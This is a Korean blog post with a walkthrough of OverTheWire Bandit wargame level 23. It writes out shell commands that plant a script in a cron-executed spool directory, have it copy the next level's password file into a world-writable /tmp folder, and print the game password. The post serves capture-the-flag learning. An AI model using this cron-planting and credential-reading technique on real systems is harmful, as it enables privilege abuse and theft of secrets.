티스토리 뷰

Wargame/OverTheWire

[Bandit] Level 23

do9dark 2016.02.02 22:10

Level Goal

다음 레벨로 넘어가는데 필요한 패스워드는 /etc/cron.d/에서 정보를 획득해서 확인할 수 있다.


$ cd /etc/cron.d/

$ cat cronjob_bandit24

$ cat /usr/bin/cronjob_bandit24.sh


cronjob_bandit24.sh을 보면 /var/spool/bandit24에 있는 스크립트를 실행하고 제거하는 것을 알 수 있고 이를 이용해서 다음 레벨의 패스워드를 획득할 수 있다.

$ mkdir -p /tmp/do9dark/

$ cd /tmp/do9dark/

$ cat > dump.sh

#!/bin/bash

cat /etc/bandit_pass/bandit24 > /tmp/do9dark/bandit_pass

(Ctrl+D)

$ chmod 777 dump.sh

$ chmod 777 /tmp/do9dark/

$ cp dump.sh /var/spool/bandit24/


$ cat bandit_pass


bandit24:UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

'Wargame > OverTheWire' 카테고리의 다른 글

[Bandit] Level 26  (0) 2016.02.02
[Bandit] Level 25  (0) 2016.02.02
[Bandit] Level 24  (0) 2016.02.02
[Bandit] Level 23  (0) 2016.02.02
[Bandit] Level 22  (0) 2016.02.02
[Bandit] Level 21  (0) 2016.02.02
[Bandit] Level 20  (0) 2016.02.02
[Bandit] Level 19  (0) 2016.02.02
[Bandit] Level 18  (0) 2016.02.02
[Bandit] Level 17  (0) 2016.02.02
[Bandit] Level 16  (0) 2016.02.02
댓글
댓글쓰기 폼
«   2019/01   »
    1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31    
링크
공지사항
Total
68,406
Today
0
Yesterday
23